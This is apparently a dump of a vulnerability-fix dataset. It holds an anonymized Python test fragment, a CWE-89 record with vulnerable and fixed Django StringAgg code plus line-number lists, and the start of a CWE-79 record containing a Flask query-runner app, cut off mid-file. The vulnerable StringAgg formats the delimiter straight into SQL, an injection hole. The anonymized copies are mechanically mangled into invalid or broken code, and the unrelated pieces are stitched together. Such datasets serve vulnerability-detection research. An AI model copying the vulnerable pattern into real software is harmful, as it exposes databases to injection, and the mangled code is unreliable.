VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format="date-time")
VAR_37 = VAR_1.patch(f"{VAR_0}.DateTimeProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_37.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_37.return_value
VAR_37.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_37.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_26(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format="date")
VAR_38 = VAR_1.patch(f"{VAR_0}.DateProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_38.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_38.return_value
VAR_38.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_38.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_27(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format="binary")
VAR_39 = VAR_1.patch(f"{VAR_0}.FileProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_39.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_39.return_value
VAR_39.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_39.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_28(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string", schema_format=VAR_1.MagicMock())
VAR_36 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=None, default=None)
assert VAR_5 == VAR_36.return_value
VAR_36.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_24.pattern = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=VAR_24.pattern, default=VAR_24.default)
| [
2,
5,
7,
8,
12,
15,
19,
22,
27,
31,
34,
37,
42,
45,
46,
50,
52,
54,
57,
59,
63,
64,
68,
76,
83,
84,
88,
96,
103,
104,
108,
114,
121,
122,
126,
131,
135,
138,
141,
147,
158,
167,
168,
172,
180,
184,
187,
198,
211,
212,
216,
224,
228,
232,
238,
239,
245,
246,
258,
260,
264,
266,
268,
273,
278,
280,
282,
286,
293,
296,
298,
300,
307,
310,
312,
315,
318,
322,
325,
329,
330,
334,
338,
340,
342,
344,
347,
351,
353,
356,
360,
362,
364,
370,
378,
379,
383,
386,
389,
397,
403,
411,
412,
419,
421,
423,
429,
432,
439,
446,
448,
450,
454,
461,
463,
466,
481,
483,
485,
488,
489,
492,
497,
504,
506,
508,
514,
519,
521,
523,
525,
530,
532,
534,
536,
544,
546,
548,
558,
563,
565,
567,
569,
574,
577,
581,
585,
590,
591,
598,
600,
602,
605,
606,
610,
615,
621,
623,
625,
628,
629,
632,
637,
643,
645,
649,
650,
653,
658,
664,
666,
670,
671,
674,
679,
685,
687,
689,
692,
693,
697,
702
] | [
2,
4,
8,
10,
11,
15,
17,
20,
23,
26,
29,
33,
36,
41,
45,
48,
51,
56,
59,
62,
63,
65,
68,
71,
72,
76,
78,
82,
85,
88,
89,
93,
101,
108,
111,
114,
117,
118,
122,
130,
137,
140,
143,
146,
147,
151,
157,
164,
167,
168,
170,
173,
174,
178,
179,
181,
184,
187,
188,
192,
193,
195,
198,
201,
202,
206,
207,
209,
212,
213,
217,
222,
226,
229,
232,
238,
249,
258,
261,
266,
269,
272,
275,
279,
282,
283,
287,
295,
299,
302,
313,
326,
329,
339,
341,
343,
348,
349,
353,
361,
365,
369,
375,
376,
382,
383,
395,
397,
401,
403,
405,
410,
415,
417,
419,
423,
430,
433,
435,
437,
444,
447,
449,
452,
455,
459,
462,
466,
470,
472,
477,
482,
484,
485,
489,
493,
495,
497,
499,
502,
506,
508,
511,
515,
517,
519,
525,
533,
536,
539,
545,
546,
550,
558,
564,
572,
575,
577,
580,
581,
589,
591,
593,
599,
602,
609,
617,
619,
621,
625,
632,
634,
636,
639,
655,
657,
659,
662,
663,
666,
671,
679,
681,
683,
689,
694,
696,
698,
700,
706,
708,
710,
712,
721,
723,
725,
735,
741,
743,
745,
747,
752,
755,
759,
763,
768,
772,
774,
779,
780,
787,
789,
791,
794,
795,
799,
804,
810,
812,
814,
817,
818,
821,
826,
832,
834,
838,
839,
842,
847,
853,
855,
859,
860,
863,
868,
874,
876,
878,
881,
882,
886,
891
] |
2CWE-89
| from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class ArrayAgg(OrderableAggMixin, Aggregate):
function = 'ARRAY_AGG'
template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'
allow_distinct = True
@property
def output_field(self):
return ArrayField(self.source_expressions[0].output_field)
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class BitAnd(Aggregate):
function = 'BIT_AND'
class BitOr(Aggregate):
function = 'BIT_OR'
class BoolAnd(Aggregate):
function = 'BOOL_AND'
class BoolOr(Aggregate):
function = 'BOOL_OR'
class JSONBAgg(Aggregate):
function = 'JSONB_AGG'
output_field = JSONField()
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class StringAgg(OrderableAggMixin, Aggregate):
function = 'STRING_AGG'
template = "%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)"
allow_distinct = True
def __init__(self, expression, delimiter, **extra):
super().__init__(expression, delimiter=delimiter, **extra)
def convert_value(self, value, expression, connection):
if not value:
return ''
return value
| from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models import Value
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class ArrayAgg(OrderableAggMixin, Aggregate):
function = 'ARRAY_AGG'
template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'
allow_distinct = True
@property
def output_field(self):
return ArrayField(self.source_expressions[0].output_field)
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class BitAnd(Aggregate):
function = 'BIT_AND'
class BitOr(Aggregate):
function = 'BIT_OR'
class BoolAnd(Aggregate):
function = 'BOOL_AND'
class BoolOr(Aggregate):
function = 'BOOL_OR'
class JSONBAgg(Aggregate):
function = 'JSONB_AGG'
output_field = JSONField()
def convert_value(self, value, expression, connection):
if not value:
return []
return value
class StringAgg(OrderableAggMixin, Aggregate):
function = 'STRING_AGG'
template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'
allow_distinct = True
def __init__(self, expression, delimiter, **extra):
delimiter_expr = Value(str(delimiter))
super().__init__(expression, delimiter_expr, **extra)
def convert_value(self, value, expression, connection):
if not value:
return ''
return value
| sql | {
"code": [
" template = \"%(function)s(%(distinct)s%(expressions)s, '%(delimiter)s'%(ordering)s)\"",
" super().__init__(expression, delimiter=delimiter, **extra)"
],
"line_no": [
54,
58
]
} | {
"code": [
"from django.db.models import Value",
" template = '%(function)s(%(distinct)s%(expressions)s %(ordering)s)'",
" super().__init__(expression, delimiter_expr, **extra)"
],
"line_no": [
2,
55,
60
]
} | from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class CLASS_0(OrderableAggMixin, Aggregate):
VAR_0 = 'ARRAY_AGG'
VAR_1 = '%(VAR_0)s(%(distinct)s%(expressions)s %(ordering)s)'
VAR_2 = True
@property
def VAR_6(self):
return ArrayField(self.source_expressions[0].output_field)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_1(Aggregate):
VAR_0 = 'BIT_AND'
class CLASS_2(Aggregate):
VAR_0 = 'BIT_OR'
class CLASS_3(Aggregate):
VAR_0 = 'BOOL_AND'
class CLASS_4(Aggregate):
VAR_0 = 'BOOL_OR'
class CLASS_5(Aggregate):
VAR_0 = 'JSONB_AGG'
VAR_6 = JSONField()
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_6(OrderableAggMixin, Aggregate):
VAR_0 = 'STRING_AGG'
VAR_1 = "%(VAR_0)s(%(distinct)s%(expressions)s, '%(VAR_7)s'%(ordering)s)"
VAR_2 = True
def __init__(self, VAR_4, VAR_7, **VAR_8):
super().__init__(VAR_4, VAR_7=delimiter, **VAR_8)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return ''
return VAR_3
| from django.contrib.postgres.fields import ArrayField, JSONField
from django.db.models import Value
from django.db.models.aggregates import Aggregate
from .mixins import OrderableAggMixin
__all__ = [
'ArrayAgg', 'BitAnd', 'BitOr', 'BoolAnd', 'BoolOr', 'JSONBAgg', 'StringAgg',
]
class CLASS_0(OrderableAggMixin, Aggregate):
VAR_0 = 'ARRAY_AGG'
VAR_1 = '%(VAR_0)s(%(distinct)s%(expressions)s %(ordering)s)'
VAR_2 = True
@property
def VAR_6(self):
return ArrayField(self.source_expressions[0].output_field)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_1(Aggregate):
VAR_0 = 'BIT_AND'
class CLASS_2(Aggregate):
VAR_0 = 'BIT_OR'
class CLASS_3(Aggregate):
VAR_0 = 'BOOL_AND'
class CLASS_4(Aggregate):
VAR_0 = 'BOOL_OR'
class CLASS_5(Aggregate):
VAR_0 = 'JSONB_AGG'
VAR_6 = JSONField()
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return []
return VAR_3
class CLASS_6(OrderableAggMixin, Aggregate):
VAR_0 = 'STRING_AGG'
VAR_1 = '%(VAR_0)s(%(distinct)s%(expressions)s %(ordering)s)'
VAR_2 = True
def __init__(self, VAR_4, VAR_7, **VAR_8):
VAR_9 = Value(str(VAR_7))
super().__init__(VAR_4, VAR_9, **VAR_8)
def FUNC_1(self, VAR_3, VAR_4, VAR_5):
if not VAR_3:
return ''
return VAR_3
| [
3,
5,
9,
10,
15,
19,
24,
25,
28,
29,
32,
33,
36,
37,
40,
41,
45,
50,
51,
56,
59,
64
] | [
4,
6,
10,
11,
16,
20,
25,
26,
29,
30,
33,
34,
37,
38,
41,
42,
46,
51,
52,
57,
61,
66
] |
1CWE-79
| import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, get_preferences
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
app = Flask(__name__)
app.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
app.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
# Is ok if we can't load config.yaml
pass
app.register_blueprint(auth)
app.register_blueprint(health_blueprint)
app.register_blueprint(user_blueprint)
app.register_blueprint(templatehelpers)
global_conn = Connections(app.config)
app.session_interface = RedisSessionInterface(global_conn.redis)
class QueriesRangeBasedPagination(RangeBasedPagination):
def get_page_link(self, page_key, limit):
get_params = dict(request.args)
get_params.update({
'from': page_key, 'limit': limit})
return url_for('query_runs_all', **dict(
[(key, value) for key, value in list(get_params.items())])
)
def order_queryset(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def filter_queryset(self):
if self.page_key is None:
return
from_query = g.conn.session.query(Query).get(self.page_key)
if from_query:
from_qrun_id = from_query.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > from_qrun_id)
else:
self.queryset = self.queryset.filter(
QueryRun.id < from_qrun_id)
@app.before_request
def setup_context():
g.conn = Connections(app.config)
@app.teardown_request
def kill_context(exception=None):
g.conn.close_all()
@app.route("/")
def index():
return render_template("landing.html", user=get_user())
@app.route("/api/query/unstar", methods=["POST"])
def unstar_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(star)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@app.route("/api/query/star", methods=["POST"])
def star_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = Star()
star.user = get_user()
star.query = query
g.conn.session.add(star)
try:
g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@app.route("/query/new")
def new_query():
if get_user() is None:
return redirect("/login?next=/query/new")
query = Query()
query.user = get_user()
g.conn.session.add(query)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/fork/<int:id>")
def fork_query(id):
if get_user() is None:
return redirect("/login?next=fork/{id}".format(id=id))
query = Query()
query.user = get_user()
parent_query = g.conn.session.query(Query).filter(Query.id == id).one()
query.title = parent_query.title
query.parent_id = parent_query.id
query.description = parent_query.description
g.conn.session.add(query)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=parent_query.latest_rev.text)
query.latest_rev = query_rev
g.conn.session.add(query)
g.conn.session.add(query_rev)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/query/<int:query_id>")
def query_show(query_id):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
can_edit = get_user() is not None and get_user().id == query.user_id
is_starred = False
if get_user():
is_starred = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == query_id).scalar() == 1
jsvars = {
'query_id': query.id,
'can_edit': can_edit,
'is_starred': is_starred,
'published': query.published,
'preferences': get_preferences()
}
if query.latest_rev and query.latest_rev.latest_run_id:
jsvars['qrun_id'] = query.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
query=query,
jsvars=jsvars,
latest_rev=query.latest_rev
)
@app.route('/query/<int:query_id>/result/latest/<string:resultset_id>/<string:format>')
def query_output_redirect(query_id, resultset_id, format):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
qrun_id = query.latest_rev.latest_run_id
# FIXME: Enforce HTTPS everywhere in a nicer way!
resp = redirect(
url_for('output_result', qrun_id=qrun_id,
resultset_id=resultset_id, format=format,
_external=True, _scheme='https')
)
# CORS on the redirect
resp.headers.add('Access-Control-Allow-Origin', '*')
return resp
@app.route('/api/query/meta', methods=['POST'])
def api_set_meta():
if get_user() is None:
return "Authentication required", 401
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
query.title = request.form['title']
if 'published' in request.form:
query.published = request.form['published'] == '1'
if 'description' in request.form:
query.description = request.form['description']
g.conn.session.add(query)
g.conn.session.commit()
return json.dumps({'id': query.id})
@app.route('/api/query/run', methods=['POST'])
def api_run_query():
if get_user() is None:
return "Authentication required", 401
text = request.form['text']
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if query.latest_rev and query.latest_rev.latest_run:
result = worker.run_query.AsyncResult(query.latest_rev.latest_run.task_id)
if not result.ready():
result.revoke(terminate=True)
query.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(query.latest_rev.latest_run)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=text)
query.latest_rev = query_rev
# XXX (phuedx, 2014/08/08): This deviates from the pre-existing
# QueryRevision interface, but I'm not confident that SQLAlchemy would
# invalidate a cached result for a relationship if a property changed.
query_run = QueryRun()
query_run.rev = query_rev
query_run.status = QueryRun.STATUS_QUEUED
g.conn.session.add(query_run)
g.conn.session.add(query)
g.conn.session.commit()
query_rev.latest_run = query_run
query_run.task_id = worker.run_query.delay(query_run.id).task_id
g.conn.session.add(query_rev)
g.conn.session.add(query_run)
g.conn.session.commit()
return json.dumps({
'qrun_id': query_run.id
})
@app.route("/query/runs/all")
def query_runs_all():
queries = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
queries_filter = 'all'
if request.args.get('published') == 'true':
queries = queries.filter(Query.published)
queries_filter = 'published'
limit = int(request.args.get(
'limit', app.config.get('QUERY_RESULTS_PER_PAGE', 50)))
queries, prev_link, next_link = QueriesRangeBasedPagination(
queries, request.args.get('from'), limit,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), queries=queries,
prev_link=prev_link, next_link=next_link,
queries_filter=queries_filter)
@app.route('/run/<int:qrun_id>/status')
def run_status(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query_run id', status=404)
return Response(json.dumps({
'status': qrun.status_message,
'extra': json.loads(qrun.extra_info or '{}'),
'timestamp': qrun.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@app.route("/run/<int:qrun_id>/output/<int:resultset_id>/<string:format>")
def output_result(qrun_id, resultset_id=0, format='json'):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
response = Response('No such query_run id', status=404)
else:
reader = SQLiteResultReader(qrun, app.config['OUTPUT_PATH_TEMPLATE'])
try:
response = output.get_formatted_response(format, qrun, reader, resultset_id)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
response = Response('No such resultset id', status=404)
else:
raise
response.headers['Access-Control-Allow-Origin'] = '*'
return response
@app.route("/run/<int:qrun_id>/meta")
def output_run_meta(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query run id', status=404)
return Response(json.dumps(
{
'run': qrun,
'rev': qrun.rev,
'query': qrun.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/rev/<int:rev_id>/meta")
def output_rev_meta(rev_id):
rev = g.conn.session.query(QueryRevision).get(rev_id)
if not rev:
return Response('No such query revision id', status=404)
return Response(json.dumps(
{
'latest_run': rev.latest_run,
'rev': rev,
'query': rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/query/<int:query_id>/meta")
def output_query_meta(query_id):
query = g.conn.session.query(Query).get(query_id)
if not query:
return Response('No such query id', status=404)
return Response(json.dumps(
{
'latest_run': query.latest_rev.latest_run,
'latest_rev': query.latest_rev,
'query': query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/explain/<int:connection_id>")
def output_explain(connection_id):
cur = g.conn.replica.cursor()
try:
cur.execute('SHOW EXPLAIN FOR %d;' % connection_id)
except cur.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
# 1094 = Unknown thread id
# 1915, 1933 = Target is not running an EXPLAINable command
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
{
'headers': [c[0] for c in cur.description],
'rows': cur.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@app.route("/api/preferences/get/<key>")
def pref_get(key):
if get_user() is None:
return "Authentication required", 401
if key in get_preferences():
return Response(json.dumps({'key': key, 'value': get_preferences()[key]}))
else:
return Response(json.dumps({'key': key, 'error': 'novalue'}))
@app.route("/api/preferences/set/<key>/<value>")
def pref_set(key, value):
if get_user() is None:
return "Authentication required", 401
get_preferences()[key] = (None if value == 'null' else value)
return Response(json.dumps({'key': key, 'success': ''})), 201
if __name__ == '__main__':
app.run(port=5000, host="0.0.0.0")
| import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, get_preferences
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
app = Flask(__name__)
app.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
app.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
# Is ok if we can't load config.yaml
pass
app.register_blueprint(auth)
app.register_blueprint(health_blueprint)
app.register_blueprint(user_blueprint)
app.register_blueprint(templatehelpers)
global_conn = Connections(app.config)
app.session_interface = RedisSessionInterface(global_conn.redis)
class QueriesRangeBasedPagination(RangeBasedPagination):
def get_page_link(self, page_key, limit):
get_params = dict(request.args)
get_params.update({
'from': page_key, 'limit': limit})
return url_for('query_runs_all', **dict(
[(key, value) for key, value in list(get_params.items())])
)
def order_queryset(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def filter_queryset(self):
if self.page_key is None:
return
from_query = g.conn.session.query(Query).get(self.page_key)
if from_query:
from_qrun_id = from_query.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > from_qrun_id)
else:
self.queryset = self.queryset.filter(
QueryRun.id < from_qrun_id)
@app.before_request
def setup_context():
g.conn = Connections(app.config)
@app.teardown_request
def kill_context(exception=None):
g.conn.close_all()
@app.route("/")
def index():
return render_template("landing.html", user=get_user())
@app.route("/api/query/unstar", methods=["POST"])
def unstar_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(star)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@app.route("/api/query/star", methods=["POST"])
def star_query():
if get_user() is None:
return "Unauthorized access", 403
query = g.conn.session.query(Query).get(request.form['query_id'])
if query:
star = Star()
star.user = get_user()
star.query = query
g.conn.session.add(star)
try:
g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@app.route("/query/new")
def new_query():
if get_user() is None:
return redirect("/login?next=/query/new")
query = Query()
query.user = get_user()
g.conn.session.add(query)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/fork/<int:id>")
def fork_query(id):
if get_user() is None:
return redirect("/login?next=fork/{id}".format(id=id))
query = Query()
query.user = get_user()
parent_query = g.conn.session.query(Query).filter(Query.id == id).one()
query.title = parent_query.title
query.parent_id = parent_query.id
query.description = parent_query.description
g.conn.session.add(query)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=parent_query.latest_rev.text)
query.latest_rev = query_rev
g.conn.session.add(query)
g.conn.session.add(query_rev)
g.conn.session.commit()
return redirect(url_for('query_show', query_id=query.id))
@app.route("/query/<int:query_id>")
def query_show(query_id):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
can_edit = get_user() is not None and get_user().id == query.user_id
is_starred = False
if get_user():
is_starred = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == query_id).scalar() == 1
jsvars = {
'query_id': query.id,
'can_edit': can_edit,
'is_starred': is_starred,
'published': query.published,
'preferences': get_preferences()
}
if query.latest_rev and query.latest_rev.latest_run_id:
jsvars['qrun_id'] = query.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
query=query,
jsvars=jsvars,
latest_rev=query.latest_rev
)
@app.route('/query/<int:query_id>/result/latest/<string:resultset_id>/<string:format>')
def query_output_redirect(query_id, resultset_id, format):
query = g.conn.session.query(Query).filter(Query.id == query_id).one()
qrun_id = query.latest_rev.latest_run_id
# FIXME: Enforce HTTPS everywhere in a nicer way!
resp = redirect(
url_for('output_result', qrun_id=qrun_id,
resultset_id=resultset_id, format=format,
_external=True, _scheme='https')
)
# CORS on the redirect
resp.headers.add('Access-Control-Allow-Origin', '*')
return resp
@app.route('/api/query/meta', methods=['POST'])
def api_set_meta():
if get_user() is None:
return "Authentication required", 401
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
query.title = request.form['title']
if 'published' in request.form:
query.published = request.form['published'] == '1'
if 'description' in request.form:
query.description = request.form['description']
g.conn.session.add(query)
g.conn.session.commit()
return json.dumps({'id': query.id})
@app.route('/api/query/run', methods=['POST'])
def api_run_query():
if get_user() is None:
return "Authentication required", 401
text = request.form['text']
query = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if query.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if query.latest_rev and query.latest_rev.latest_run:
result = worker.run_query.AsyncResult(query.latest_rev.latest_run.task_id)
if not result.ready():
result.revoke(terminate=True)
query.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(query.latest_rev.latest_run)
g.conn.session.commit()
query_rev = QueryRevision(query_id=query.id, text=text)
query.latest_rev = query_rev
# XXX (phuedx, 2014/08/08): This deviates from the pre-existing
# QueryRevision interface, but I'm not confident that SQLAlchemy would
# invalidate a cached result for a relationship if a property changed.
query_run = QueryRun()
query_run.rev = query_rev
query_run.status = QueryRun.STATUS_QUEUED
g.conn.session.add(query_run)
g.conn.session.add(query)
g.conn.session.commit()
query_rev.latest_run = query_run
query_run.task_id = worker.run_query.delay(query_run.id).task_id
g.conn.session.add(query_rev)
g.conn.session.add(query_run)
g.conn.session.commit()
return json.dumps({
'qrun_id': query_run.id
})
@app.route("/query/runs/all")
def query_runs_all():
queries = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
queries_filter = 'all'
if request.args.get('published') == 'true':
queries = queries.filter(Query.published)
queries_filter = 'published'
limit = int(request.args.get(
'limit', app.config.get('QUERY_RESULTS_PER_PAGE', 50)))
queries, prev_link, next_link = QueriesRangeBasedPagination(
queries, request.args.get('from'), limit,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), queries=queries,
prev_link=prev_link, next_link=next_link,
queries_filter=queries_filter)
@app.route('/run/<int:qrun_id>/status')
def run_status(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query_run id', status=404)
return Response(json.dumps({
'status': qrun.status_message,
'extra': json.loads(qrun.extra_info or '{}'),
'timestamp': qrun.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@app.route("/run/<int:qrun_id>/output/<int:resultset_id>/<string:format>")
def output_result(qrun_id, resultset_id=0, format='json'):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
response = Response('No such query_run id', status=404)
else:
reader = SQLiteResultReader(qrun, app.config['OUTPUT_PATH_TEMPLATE'])
try:
response = output.get_formatted_response(format, qrun, reader, resultset_id)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
response = Response('No such resultset id', status=404)
else:
raise
response.headers['Access-Control-Allow-Origin'] = '*'
return response
@app.route("/run/<int:qrun_id>/meta")
def output_run_meta(qrun_id):
qrun = g.conn.session.query(QueryRun).get(qrun_id)
if not qrun:
return Response('No such query run id', status=404)
return Response(json.dumps(
{
'run': qrun,
'rev': qrun.rev,
'query': qrun.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/rev/<int:rev_id>/meta")
def output_rev_meta(rev_id):
rev = g.conn.session.query(QueryRevision).get(rev_id)
if not rev:
return Response('No such query revision id', status=404)
return Response(json.dumps(
{
'latest_run': rev.latest_run,
'rev': rev,
'query': rev.query
}, default=json_formatter),
mimetype='application/json',
